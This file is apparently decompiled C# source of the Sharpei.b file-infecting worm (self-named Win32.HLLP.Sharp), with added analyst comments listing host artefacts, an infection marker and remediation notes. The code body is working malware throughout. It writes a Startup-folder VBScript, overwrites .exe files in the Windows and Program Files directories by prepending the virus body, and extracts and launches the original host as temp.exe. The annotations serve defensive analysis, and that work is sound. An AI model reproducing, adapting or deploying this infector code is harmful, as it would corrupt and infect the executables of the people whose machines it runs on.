MalwareSourceCode/MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.cs

// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Sharp
{
// ANALYST NOTES (decompiled sample, comments added for defensive review; code is unchanged).
// Behaviour visible in this class:
//   * drops "Sharp.vbs" into the current user's Startup folder,
//   * overwrites *.exe files in selected directories with the file named by `virname`
//     and appends the original program behind it (prepending file infector),
//   * extracts everything after byte 12288 of `virname` into "temp.exe" and runs it.
// Host artefacts worth hunting for, all taken from the literals below:
//   registry key HKLM\Software\Sharp, <Startup>\Sharp.vbs, and the relative file names
//   "temp.exe" / "hostcopy.exe" (created in the process's working directory).
public class Sharp
{
// Path used as the infection source, read once from the default ("") value of
// HKLM\Software\Sharp when the type is initialised. Nothing in this class writes
// that key, so it is presumably created by another component or an earlier stage
// (not visible here). OpenSubKey returns null when the key is absent, in which case
// type initialisation fails and Main never runs.
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
/// <summary>
/// Entry point: writes the Startup script, infects executables in the parent of the
/// system directory and in three Program Files subdirectories, then unpacks and
/// launches the payload that follows the first 12288 bytes of <c>virname</c>.
/// </summary>
[STAThread]
private static void Main()
{
// Startup-folder artefact: a VBScript that only shows a message box at each logon.
// The file name and the message text are stable strings suitable for detection content.
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
text.Close();
// Parent of the system directory (typically the Windows directory).
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
Sharp.Sharp.FileSearch(fullName);
// Hard-coded indexes 11-13 into the Program Files listing: which folders are hit depends
// on enumeration order, and with fewer than 14 subdirectories the unhandled
// IndexOutOfRangeException ends the process here. Relevant when a sandbox run of this
// sample shows the Startup script but no payload execution.
Sharp.Sharp.FileSearch(directories[11]);
Sharp.Sharp.FileSearch(directories[12]);
Sharp.Sharp.FileSearch(directories[13]);
// Copy everything after offset 12288 of `virname` into "temp.exe". Since FileSearch builds
// infected files as <virname contents> + <original program>, 12288 is presumably the size
// of the virus body and the remainder the original host program (confirm against the sample).
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
fileStream1.Seek(12288L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
long length = fileStream2.Length;
fileStream2.Close();
// The extracted file is started only if it is non-empty and the source path does not end
// with "MS02-010.exe"; that name looks like a security-bulletin lure, presumably the copy
// that has no host program attached (inferred from the name, not shown in this class).
// Observable as a child process "temp.exe" spawned from the infected executable.
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
// Retries the delete with every error swallowed until "temp.exe" is gone; the loop does
// not sleep, so it spins for as long as the file cannot be deleted.
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
}
/// <summary>
/// Processes the <c>*.exe</c> files directly inside <paramref name="DirectoryToCheck"/>
/// (the two-argument GetFiles overload does not recurse): each file whose byte at
/// offset 18 is not 103 is replaced by the <c>virname</c> file followed by the file's
/// original contents.
/// </summary>
/// <param name="DirectoryToCheck">Directory whose top-level executables are examined.</param>
private static void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int length = files.Length;
for (int index = 0; index < length; ++index)
{
string str = files[index];
// Infection marker check: byte at offset 18 (0x12, inside the DOS header's checksum
// field) compared with 103 (0x67). Files already carrying that value are skipped;
// presumably the virus body has 0x67 at this offset (verify in the binary). On its own
// this byte is a weak indicator; combine it with the other artefacts.
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num = fileStream1.ReadByte();
fileStream1.Close();
if (num != 103)
{
try
{
// Clears read-only/hidden/system attributes, stages the original as "hostcopy.exe",
// overwrites the target with the `virname` file and appends the staged original.
// For remediation this means the original program is still present inside an infected
// file, after the prepended body (12288 bytes if the assumption noted in Main holds).
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy(Sharp.Sharp.virname, str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
// All failures are swallowed. A failure after the overwrite but before the append
// completes can leave the target without its original contents, so affected machines
// may hold damaged executables as well as infected ones.
}
}
}
// Removes the staging copy; "hostcopy.exe" therefore exists only while a directory is
// being processed.
File.Delete("hostcopy.exe");
}
}
}